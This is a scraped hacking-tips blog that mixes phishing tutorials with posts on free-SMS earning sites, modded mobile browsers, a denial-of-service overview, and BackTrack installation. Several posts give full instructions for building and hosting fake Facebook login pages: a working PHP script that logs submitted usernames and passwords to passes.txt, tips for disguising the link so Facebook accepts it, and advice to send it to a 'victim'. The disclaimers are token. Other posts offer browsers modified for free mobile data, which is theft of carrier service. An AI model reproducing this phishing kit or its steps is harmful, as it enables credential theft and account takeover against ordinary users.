Facebook hacking | Phishing | Webhost [ Full tutorial ] | .::APAJR::.

 Now in this article i am going to teach you how to set up the Phishing site, which is the Difficult task than making a Phishing site.

Step 1: The First Step in Making the site is to regester an account at http://www.000webhost.com/order.php (if you have account than you can skip first 2 steps)

Step 2: Now Goto your email account that you gave and confirm your account with confirmation link

Step 3: Now Download this FILE


                                                     

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.

Step 5: Now when you are logged into your account click on the Go to Cpanel  in front of your domain that you had registered, and then Go to File Manager under Files and log into it.

.

Step 6: Now Click on the Public_html.

Step 7: Now click on the Upload button, choose the file under the Archives that you have downloaded, to be uploaded.

Step 7: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, they will be taken to another page that will show them error. So there is less chance that it will be detected.


NOTE::: To access the input data ( Usernames and Password ) Goto the Following Address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.

PS:> If www.p4o.net didn't worked for you, you can use :
www.drivehq.com
www.yourfreehosting.net
www.esmartstart.com

=============================================================
The Input Data (Email and Password) will look like following:

==============================================================
UPDATE:
Now if you have successfully made the Phishing page(site) then you must know that on Facebook you cannot post it, mail it, or sent it in chat. e.g: www.yoursite.p4o.net. This is because Facebook dont allow the T35.com sites. So Solution to this problem is to use http://www.dot.tk for the URL hiding.
All you have to do is to Goto http://www.dot.tk , on the main page enter your Phishers address and get a domain for that. Like for www.myphisher.p4o.net you gets www.myphisher.tk. And facebook will allow you to post it

HOW TO FIND YOUR USERNAME?
Ok guys this is the most asked question of all so here is a simple answer, just look in the following picture of Admin Paned the red shaded area tells you the username of the website

.

===================================================================

Read More

5 major differences between blog and website | .::APAJR::.

Differences between a blog and a website are highly searched in today's online arena. Blogging/blog words are so intensely used around the net, that many newbies get stuck on the point here. So i thought why not to mention the basic differences between the two ways by which we can publish our content online.

To summarize, blog is a type of a website (Web log= Blog). Website is a general term. (site on web=website). You might have heard about those static sites and dynamic sites.

That idea supports the Blog vs Website theory. There are few technical differences, as to how the data is presented to the readers. We would also discuss couple of reasons due to which blogs are highly considered now days, to present data online.

And yea, if you are wondering about the eBook series, its not finished yet. In fact we are onto the interesting part. So stay tuned for it in the coming days. Its always better to change some taste. Isn't it?

Blog vs Website-Characteristics Match up

According to Wikipedia, a blog is as follows:

A blog (a blend of the term web log) is a type of website or part of a website supposed to be updated with new content from time to time

Blogs are generally more informally presented to the visitors. The language used is often much simplerthan on websites. (though its not necessary as many webmasters now have started to use simpler language, to make their view point clear to a wider range of people, around the globe.)

In blogs, there is a thing called posts, as what you are reading now. Every post have its own static page (as the url suggests), but the main page of the blog is dedicated to the
series of latest posts in reverse-chronological (latest to oldest) order.

Bloggers often prefer to show around 8-12 recent posts on their blogs main (home) page. Where as there is nothing such in a static website. Even if a website is about tutorials (like Lisa Arby's popular website, 2createawebsite.com). The website was launched years ago, when the blogging wasn't quite into the online world.

She did a pretty neat job with the sequence of the content. Interlinking was perfect. You could take a look to that site, in order to get to know the feel of a static website.

The major difference between the two types, blog and a static website is about the content refreshment. The major content of website remains the same. Though the webmaster could add additional pages to the website to increase the content, but the order by which the information is presented could not be later changed. (isn't changed).

Thats where blog have started to gain popularity. Have you ever thought about the way you search internet now days? You either follow a specific, popular blog right away (through bookmarks) or in most cases, you search search engines.

Search engines help you to get to a specific question (like how to add bla bla to blogger). It would take you to the static page, with the best information of the particular topic, either it comes from blog or website. So the content is basically searched the same way as before (through search engines), but blogs provide adifferent dimension to the way information is presented.

Another huge aspect of blogs due to which people have adopted them, are their ability to get crawled by search engines frequently. As the posts are updated on daily basis (sometimes many times in a day), so search engines crawl blogs many times a day in order to fetch new content.

To summarize a blog:

1. Blogs provide commenting system


2. Updated almost daily


3. Articles appearing in reverse-chronological order


4. Frequently crawled by Search Engines


5. Often covers a wide variety of articles

 

Consider a any static website, say on a topic 'Make Money Online'. So the general idea of the content would revolve around the said topic. Where as blogs are often vast in nature. Blogs publish them as e.g, Technology blog. So you would get to know about every unique/latest technologies through different posts.

Blogs are more like newspapers. Covering a vast variety of topics.

Read More

Make Phishing Page of any site | .::APAJR::.

This tutorial is for educational purpose only.

Warning & Disclaimer:

Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, "How to create phishing page?". If you use this to hack anyone account, then we will not responsible for it. Do anything on your own risk.

What is phishing page?

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, we just clone a site login or any other important page.

How to create?

• Visit the page that you want to clone.


• Save it (CTRL+S) via your browser.


• Choose save complete webpage while saving it via browser.


• Give name index while saving. (Dont use other name!)


• Save it to a folder.


• Now, you should have one file named "index.htm" and a folder.


• We have to edit index.htm file.


• Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Changehttps://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.

How to create login.php?

Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

Code:

<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

You have to change

http://www.google.com

 to the site url that you are cloning, for example, change it to

http://www.facebook.com/

 if you are cloning facebook.

Now, you have your phishing page.
 
Face book phishing page here
 
                       

 
 
 
 

Read More

Earn free mobile recharge by sending SMS from ULTOO | .::APAJR::.

Ultoo.com redefining the way of messaging. For all those who are using way2sms etc, here is the best one from which you will be benefited also. It will pay you for your each activity. ULTOO is a brand new SMS sending website with a excellent experience which pays you for each and ever message send by you and you can use that credit to get a free mobile recharge.
The messages are send at the lightning fast speed without any advertisement attached to it. The other ways to earn through ULTOO is by referring a friend you get payed Rs 1 for every friend referral.

Sign Up

Advantages of using ultoo.com

• Get 2 paisa for every message you send.
• Get 1 Rs. for every friend you invite.
• Get 2 Rs. for creating a new account.
• Get free recharge for your mobile of a minimum 10 Rs. Balance.
• Easily manageable:
  you can save your contacts easily and without any delay.
  your message will be sent in just no time across INDIA.
• Its highly secured and spam free.

Disadvantages of using ultoo.com:

• You need to have a minimum of 10 Rs balance to redeem your first recharge.
• You cannot send multiple messages and fool them by sending them the same message to your contacts.
• You need to send minimum 500 messages to earn 10 Rs and thus it will take nearly 2 hours continuously to earn it.
• Again the users sometimes gets irritated for the number of advertisements used on ultoo.com

Click to enlarge

Read More

Send FreeSMS, Earn Money, Recharge Mobile – Ultoo.in | .::APAJR::.

Send FreeSMS, Earn Money, Recharge Mobile – Ultoo.in

Its easy to send sms from pc/laptop than mobile.

Recently I got know a website named ultoo.in which can be used to send free sms and get paid of 2 ps per sms you send.But to use any message service for free is not much beneficial then using it for 2 paisa per sms.

JOIN ULTOO.IN

What you have do?

•  Each person have to sign up from the official website page of Ultoo.in.


• For signing up you have put all the necessary information including name, email and phone number in the registration form.


• After that, log in into your account and start using it.

Join neobux and earn a little pocket money>!

How you earn?

For successful Registration Rs 2.
For email verification Rs 1(first time only).
For sending sms 2 paisa/sms.
For inviting friends(through SMS)Rs 1.
For inviting friends(through email)Rs 1.

JOIN ULTOO.IN

Also read;

Ultoo Multisending sms, Earn Faster [Ultoo Multisending Tricks]

FAQs

Q What is the concept behind ULtoo.com?

An average Indian sends 50-100 SMS in a month and ULtoo.com provides a unique platform to these users where they can send free messages and get rewarded with a mobile recharge in return. Moreover, its incredible speed of sending SMS adds more to its beauty.

Q Is it FREE or do I have to pay for sending SMS?

Sending SMS through ULtoo.com is absolutely free. In fact, you will earn by sending every single text. So, start sending messages which will lead to a good earning every time.

Q How can I change my password?

Once you login to your account ,click on the link “Settings” and then click on “Account settings”. Now, click on the “CHANGE” button at the PASSWORD section and you will be able to change your password by first entering the old password and then the new desired password.

Q I forgot my password. What can I do?

In case you forget your password, go to our website. Click on the link that says ‘Forgot your password?’ and enter the required information correctly. Press on the ‘submit’ button after entering the asked details and your password will be delivered to your registered mobile number instantly.

Q How to upload contact and build a private address book?

You can upload and manage your own personal contact book through “Phonebook” option.

Q Can I send SMS across India for FREE?

Yes, you can send SMS across India for FREE and you will be rewarded with 2 paisa for every sent SMS.

Q Can I send Group SMS from ULtoo.com?

Sorry, this is only a person to person messaging site. Currently, Group sms feature is not supported.

Q What are the various activities which can help me to get a recharge?

For successful Registration Rs 2.

For email verification Rs 1(first time only).                                   {  Join neobux and earn a little pocket money>!}

For sending sms 2 paisa/sms.

For inviting friends(through SMS)Rs 1.

For inviting friends(through email)Rs 1.

Note : The earnings for an Invite will get credited only when your friends or the receiver of the invite will register, login and send an SMS from ULtoo.com

Q What is My Wallet?

My wallet reflects your current earning in Rupees and Paise.

Q How do I keep track of my earnings and withdrawal?

You can keep track of your earning and withdraw through credit and debit history respectively.

Q How can I see the transaction history?

You can view your credit and debit details in the “My Wallet” section of ULtoo.com.

Q How can I redeem my earnings?

You can redeem earnings in the form of FREE Mobile recharge.

Q When can I withdraw my earnings?

To withdraw your earning you should have a minimum balance of INR 10.

Q Can I recharge other mobile numbers too?

Yes, you can recharge other mobile numbers as well. But the earning is redeemable for once only. Please make sure, you enter the correct mobile number and you are solely liable for recharge details provided by you.

Read More

Top 5 sites for free online recharge | .::APAJR::.

Earning free online mobile recharge is just like earning money online as everyone spend at least INR 100 to INR 500 monthly on mobile recharge. There are number of sites that promise you for free recharge and we will discuss here about 5 such sites.

Top 5 sites for free online recharge

So lets discuss about five websites where you can earn free online recharge.

1. Way2SMS

You must have heard about way2sms and its free SMS service. Millions of people use this site to send free SMS. Now you can also use Way2SMS to earn free online recharge.

Just create an account at Way2SMS.com and then login to your account. After login, you will see the tab for ‘Email & Win’ and ‘Share & Win’. Just click there and check the instructions to participate in free online recharge scheme.

You can also track your earnings from ‘My Earnings’ tab. You can recharge your prepaid mobile once you reach the minimum balance of INR 10.

2. Trick for Free Online Recharge

This is not a site but the tips to get online recharge. You just have to send 1 SMS to get free online recharge worth Rs. 10 to Rs. 100. Use this trick only if you have free SMS facility or SMS charges are low.

Just Type PLY A NAME UNIQUECODE and Send it to ‘882 667 1122’ .

Example : PLY A Sachin 541654

You can try another UNIQUECODE if its shows invalid in first attempt. You must get free recharge in 2-3 try. Get more info on this here

3. FreeCharge.in

You won’t get direct free online recharge from FreeCharge.in but you can recharge online and get equal amount of discount coupon for many leading stores and retailers. So if you want to recharge for Rs. 100 amount than you can get the discount coupon of Rs. 100 for any of the merchant they have tie-up.

You can utilize these coupon at various outlets like McDonald, Naaptol, Shoppers Stop etc. You have the freedom to choose your free coupon from hundreds of retail outlets.

4. RechargeItNow.com

Another easy to use and fast online recharging service. The best thing of this site is that they show you the various topups and recharge plans available at any given time. The good thing about the online recharge with this website is that unlike FreeCharge.in, you get coupons of various merchants for every recharge. You can get the assured benefits of up to Rs. 5000 with every online recharge.

5. EasyMobileRecharge.com

This website works the same way as FreeCharge.in and RechargeItNow.com by giving you free discount coupon but there is also facility to get 100% free online recharge if you complete some offers like joining MyDala, SnapDeal etc.

To get more details about the free recharge offer, just visit the site and click on ‘Free Recharge’ link on the top of the page and see the instructions.

Did you use any of the free online recharge scheme. How did you like the site? Share your opinion through comments so that others can read and review.

Read More

How to remove "Write-protection" from pendrive

                                    


There can be various types of issues related to smartphones. If the user wants to remove write protection, the first step would be to insert the pen drive and then open the Start Menu. Then proceed to the following steps to remove write protection:

• 1. Open Start Menu


• 2. Run, type regedit and press Enter; this will open the registry editor


• 3. Navigate to the following path:
  

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies



• 4. Double click the key WriteProtect in the right pane and set the value to 0 In the Value Data Box. Press OK


• 5. Exit Registry


• 6. Restart your computer and re-connect your USB pen drive on your computer.

(Thanks to Ashish for this tip!)

                          

Read More

Denial of Service (DOS) attacl : Full information | .::APAJR::.

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.

One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

Methods of attack

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. There are two general forms of DoS attacks: those that crash services and those that flood services.Attacks can be directed at any network device, including attacks on routing devices and web, electronic mail, or Domain Name System servers.

A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

1. Consumption of computational resources, such as bandwidth, disk space, or processor time.
2. Disruption of configuration information, such as routing information.
3. Disruption of state information, such as unsolicited resetting of TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

ICMP flood

A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. The network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destination. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping" command from unix-like hosts (the -t flag on Windows systems has a far less malignant function). It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for a packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

Teardrop attacks

A Teardrop attack involves sending mangled IP fragments with overlapping, over-sized payloads to the target machine. This can crash various operating systems due to a bug in their TCP/IP fragmentation re-assembly code. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack.

Around September 2009, a vulnerability in Vista was referred to as a "teardrop attack", but the attack targeted SMB2 which is a higher layer than the TCP packets that teardrop used.

Peer-to-peer attacks

Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While a typical web server can handle a few hundred connections per second before performance begins to degrade, most web servers fail almost instantly under five or six thousand connections per second. With a moderately large peer-to-peer attack, a site could potentially be hit with up to 750,000 connections in short order. The targeted web server will be plugged up by the incoming connections.

While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses. Even if a mitigation device can keep blocking IP addresses, there are other problems to consider. For instance, there is a brief moment where the connection is opened on the server side before the signature itself comes through. Only once the connection is opened to the server can the identifying signature be sent and detected, and the connection torn down. Even tearing down connections takes server resources and can harm the server.

This method of attack can be prevented by specifying in the peer-to-peer protocol which ports are allowed or not. If port 80 is not allowed, the possibilities for attack on websites can be very limited.

Asymmetry of resource utilization in starvation attacks

An attack which is successful in consuming resources on the victim computer must be either:

* carried out by an attacker with great resources, by either:
o controlling a computer with great computation power or, more commonly, large network bandwidth
o controlling a large number of computers and directing them to attack as a group. A DDOS attack is the primary example of this.
* taking advantage of a property of the operating system or applications on the victim system which enables an attack consuming vastly more of the victim's resources and the attackers (an asymmetric attack). Smurf attack, SYN flood, and NAPTHA are all asymmetric attacks.

Permanent denial-of-service attacks

A permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws which allow remote administration on the management interfaces of the victim's hardware, such as routers, printers, or other networking hardware. The attacker uses these vulnerabilities to replace a device's firmware with a modified, corrupt, or defective firmware image—a process which when done legitimately is known as flashing. This therefore "bricks" the device, rendering it unusable for its original purpose until it can be repaired or replaced.

The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack. Because of these features, and the potential and high probability of security exploits on Network Enabled Embedded Devices (NEEDs), this technique has come to the attention of numerous hacker communities. PhlashDance is a tool created by Rich Smith (an employee of Hewlett-Packard's Systems Security Lab) used to detect and demonstrate

Application-level floods

On IRC, IRC floods are a common electronic warfare weapon.

Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs.

A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets.

An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb.

Nuke

A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop.

A specific example of a nuke attack that gained some prominence is the WinNuke, which exploited the vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data was sent to TCP port 139 of the victim's machine, causing it to lock up and display a Blue Screen of Death (BSOD).

Distributed attack

A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods.

Malware can carry DDoS attack mechanisms; one of the better-known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn facilitate the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents.

These collections of systems compromisers are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered on IP spoofing and amplification like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. See next section.

Simple attacks such as SYN floods may appear with a wide range of source IP addresses, giving the appearance of a well distributed DDoS. These flood attacks do not require completion of the TCP three way handshake and attempt to exhaust the destination SYN queue or the server bandwidth. Because the source IP addresses can be trivially spoofed, an attack could come from a limited set of sources, or may even originate from a single host. Stack enhancements such as syn cookies may be effective mitigation against SYN queue flooding, however complete bandwidth exhaustion may require involvement

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion — even against their business rivals.

It is important to note the difference between a DDoS and DoS attack. If an attacker mounts an attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack.

The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines.

It should be noted that in some cases a machine may become part of a DDoS attack with the owner's consent. An example of this is the 2010 DDoS attack against major credit card companies by supporters of WikiLeaks. In cases such as this, supporters of a movement (in this case, those opposing the arrest of WikiLeaks founder Julian Assange) choose to download and run DDoS software.

Reflected attack

A distributed reflected denial of service attack (DRDoS) involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target.

ICMP Echo Request attacks (Smurf Attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing many hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack.

Many services can be exploited to act as reflectors, some harder to block than others.DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier.

Degradation-of-service attacks

"Pulsing" zombies are compromised computers that are directed to launch intermittent and short-lived floodings of victim websites with the intent of merely slowing it rather than crashing it. This type of attack, referred to as "degradation-of-service" rather than "denial-of-service", can be more difficult to detect than regular zombie invasions and can disrupt and hamper connection to websites for prolonged periods of time, potentially causing more damage than concentrated floods. Exposure of degradation-of-service attacks is complicated further by the matter of discerning whether the attacks

Unintentional denial of service

This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site's regular users — potentially hundreds of thousands of people — click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. A VIPDoS is the same, but specifically when the link was posted by a celebrity.

An example of this occurred when Michael Jackson died in 2009. Websites such as Google and Twitter slowed down or even crashed. Many sites' servers thought the requests were from a virus or spyware trying to cause a Denial of Service attack, warning users that their queries looked like "automated requests from a computer virus or spyware application".

News sites and link sites — sites whose primary function is to provide links to interesting content elsewhere on the Internet — are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, the Drudge Report, Fark, Something Awful, and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", being "drudged", "farking", "goonrushing" and "wanging"; respectively.

Denial-of-Service Level II

The goal of DoS L2 (possibly DDoS) attack is to cause a launching of a defense mechanism which blocks the network segment from which the attack originated. In case of distributed attack or IP header modification (that depends on the kind of security behavior) it will fully block the attacked network from Internet, but without system crash.

Blind denial of service

In a blind denial of service attack, the attacker has a significant advantage. The attacker must be able to receive traffic from the victim, then the attacker must either subvert the routing fabric or use the attacker's own IP address. Either provides an opportunity for the victim to track the attacker and/or filter out his traffic. With a blind attack the attacker uses one or more forged IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood attack is an example of a blind attack.

Read More

Facebook Phisher | .::APAJR::.

Facebook Phisher

Please Note:

Phishing is legally offensive. we are not responsible for any action done by you.

Hacking Facebook Account

Phishing is the most commonly used method to hack Facebook.In This technique phishing is used to create a Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo , Gmail, MySpace etc. The victim is fooled to believe the fake facebook page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her facebook login details are stolen away. I recommend the use of Phishing to hack facebook account since it is the easiest one.

To Become a smart hacker you must have some social engineering skill to make people believe that they are signing to real page.

Here are the detail steps:

step 1: At first download the Facebook phisher here

                                             

step 2:The downloaded file contains:a)Index.html and b)write.php

step 3:Now Upload this two files to any of these free webhost sites:

just sign any of listed site below and get the hosting panel

1)www.000webhost.com

2)www.x10hosting.com

3)www.my3gb.com

step 4:Send this phisher link (index.html link) to your victim and make him login to his Facebook account using your sent Phisher.

step 5: Once the logs in to his Facebook account using Phisher, all his typed Facebook id and password is stored in "passes.txt". This file is created in your webhost control panel as shown below

If you dont get passes.txt, try refreshing your page.Once you get passes.txt, you get Facebook password and can easily use it for hacking Facebook account.

step 6:Now, open passes.txt to get hacked Facebook id and password as shown below.

step 7: Congratulation now you have successfully hacked your's required Facebook account.

Go nd HAck The People :D

Read More

Office [ windows] | .::APAJR::.

Last week, Microsoft announced the new version for their office suit, MS Office 2013. Now the preview of MS Office 2013 is available for download from the official website of Microsoft. Microsoft office 2013 will include the basic applications of Office suit such as Word, Power Point, Excel, Outlook, Access etc... The new version comes with many improvements in their icons, User Interface, Hardware support and more.

Icons :

MS Office 2013 Icons

Microsoft Office 2013 comes with a new different set of Icons for all the office suits. As like windows 8 icon sets, MS office icons also comes with monochrome colors and with a tilted view. Microsoft brig that icons in order to mach with upcoming Windows 8 OS.

User Interface :

When we look at the UI of the applications, we could get the idea that Microsoft has slightly modded the UI in order make it fit with the New Metro UI which is coming with Windows 8. Totaly we can say that the UI is a mixed form of old 2010 and new Metro UI.

Design :

Microsoft Office 2013 is mainly designed for Touch Screen Display. So the entire design is maintained for accepting inputs from finger. Also it support for stylus for scribing on the screen.

Cloud based :

Now cloud computing is came to be hit. So Microsoft also tried to bring cloud features in to MS office 2013. The new version comes with integrated Sky Drive, Skype, Yammer and much more..

Support :

The new version of MS office 2013  only supports Windows 7 and Windows 8. Some times Microsoft will make this with support for old windows versions also. We can expect that.

Download MS Office Preview :

You can Download the MS Office 2013 preview from Microsoft's official site The download links are given below

• Download MS Office 2013 Preview

Read More

Opera mini 7 | .::APAJR::.

Opera Mini Next 7 Achusoft Airtel Mod April 2012

Our Previous Nimbuzz Handler For Free Gprs with Airtel and UC Browser Remoded For Airtel April Trick is now also Working well in Different Part of India. Now We are here with the New version of Opera Hacked for Free Gprs with Airtel. This Trick was tested in Kerala and was working well. From this Opera Mini Next 7 Downloading also Works well.

You can Download Opera Mini Next 7 Hack from the below given Links. After Downloading the Application install it with Mobile office or Airtel Internet Settings to get Free and Unlimited Browsing and Downloading.

August 2012 Airel Moded Opera Mini Next 7 For Free Gprs on 2g And 3g Latest Handler Trick

Join us facebook group : www.facebook.com/Apajrengineerhackers/

Download Links :

• Download Opera Mini 7 Moded for Airtel .jar


• Download Opera MIni 7 Moded for Airtel .zip

Read More

Opera mini [Free internet trick] | .::APAJR::.

Opera Mini 5.1

Opera Mini 5.1 Handler Hacked for Free Gprs from AirTel Java

Free Opera Mini August 2012 Mod For Airtel + Low memory optimized Edition

Yesterday we gave you Opera Mini 7 AirTel mod. Now we are here with Opera Mini 5.1 version hacked for free gprs with AirTel. This version is optimized for low memory phones + it has the improved User Interface also. As usual, you have to use AirtelInternet or MobileOffice settings as default. Download Links are given at the end of the post. Download from your phones and Install. Or Download from pc and copy to phones. For best result, use @ Low Balance


For More Gprs Ticks Click here

Download Links :

• Download Opera Mini 5.1 Airtel Mod .jar


• Download Opera Mini 5.1 Airtel Mod .zip

Read More

Uc browers | .::APAJR::.

We were posting many free Internet Tricks. Recently we posted a UC Browser 8.4 Handler Airtel Modded version. Today we presents The latest version of UC Browser 8.5.0 Cloud Edition which is Re-Modded for Airtel Free Gprs. This version is a test version of UC Browser 8.5 Cloud. UC Browser team has introduced many new features in this version. You can experience the new face of UC browser from this. They introduced a very good UI look. The light blue design is very cool. Since this is a test version, there is a high possibility of getting errors. You have to wait for the Official Original release of this version in order to get the problems solved.

New Features of Browser :

• New and Improved User Interface of the Home screen and Menu.


• Highly Optimized for full touch screen phones.


• Optimized Switch and Multi tab options.


• High improvement in Input methods.


• Optimized Key board for Touch screen phones.


• Brightness Adjusting feature came Back.


• Supported Sharing of Images to Face Book.

Download and Install this version on your phone with using airtel Internet settings only. Then only you will get free GPRS with Free Downloading and Browsing.
Please share this trick. Comment about your problems below.

Full version of UC 8.5 is Here

Download Links :

• UC Browser 8.5 Cloud Airtel Achusoft Modded.jar [Jjumbofiles]


• UC Browser 8.5 Cloud Airtel Achusoft Modded.zip [Jumbofiles]


• UC Browser 8.5 Cloud Airtel Achusoft Modded.jar [plunder]

Read More

Free internet with uc brower in airtel | .::APAJR::.

Hello friends, Here is the latest version of UC Browser 8.6.0 Hacked for free Internet with Airtel. Browsing and Downloading are free with this version also. New version not having any new features. But UC Browser team improved lot of features. Most notable improvement is the User Interface. They changed the style of multi tabs.

Use this with Airtel Internet ( Mobile office ) settings to get free Gprs. If you dont have the settings, send 'MO' to 543210 from your Airtel Mobile number and you will get a settings. Save it and set it as default for Applications.

New Features :

• Feature to preview image before uploading.


• Full offline downloading supported.


• Clear history feature to clear history before exiting.


• Optimized Virtual Keyboard for Touch screen phones.

Download Links :

• Download UC Browser Airtel Mod.jar [Direct]


• Download UC Browser Airtel Mod.jar [Plunder]

Read More

How to install backtrack5 on virtual machine | .::APAJR::.

You can install backtrack 5 on your system in many ways. You can install it on your system as primary OS. You can also install it as virtual machine on your windows and you can also install it as dual with some other operating system as windows.
The best way as a learner is to use backtrack as a virtual machine on your system. In this way you can use it easily with your windows.


In this tutorial i will show you how to setup backtrack as a virtual machine on your system.


First of all download the backtrack5 from the website
http://www.backtrack-linux.org/downloads/


Then download VMWARE WORKSTATION
http://downloads.vmware.com/


Install VMware workstation on your system and create a new Virtual machine.


select custom (advanced)

Choose the Virtual Machine Hardware Compatibility.
Just click on Next for defaults.
Now select the installer disk image and browse the backtrack image.

Now it will ask the guest operating system. Select Linux, then choose Other Linux 2.6.x kernel as the version.
Give a name to your virtual machine
In memroy config, set the memory for your virtual machine. i will recommend 512 MB.
In network type choose NAT
Then Select SCSI adapter type and Choose LSI Logic
Set Maximum disk size.
I recommend you to select 10GB or above
Choose Store virutal disk as a single file.
Specify disk file and Just click next.

